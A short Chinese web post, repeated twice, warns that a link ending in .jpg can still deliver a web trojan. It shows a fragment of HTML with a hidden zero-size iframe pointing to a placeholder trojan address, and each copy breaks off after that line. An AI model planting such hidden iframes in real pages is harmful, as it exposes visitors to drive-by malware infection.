如果别人发一个图片网址链接给你: http://www.xxx.com/mm.jpg 我想一般懂点电脑知识的人还是敢访问的吧。因为它的后缀是JPG,不可能是木马的,结果却是大大的杯具了。
正因为懂点知识,所以才会上当,如果直接是个小白,管你什么链接发来,直接不敢点击打开。
漏洞代码是:
<html>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
...
如果别人发一个图片网址链接给你: http://www.xxx.com/mm.jpg 我想一般懂点电脑知识的人还是敢访问的吧。因为它的后缀是JPG,不可能是木马的,结果却是大大的杯具了。
正因为懂点知识,所以才会上当,如果直接是个小白,管你什么链接发来,直接不敢点击打开。
漏洞代码是:
<html>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
...
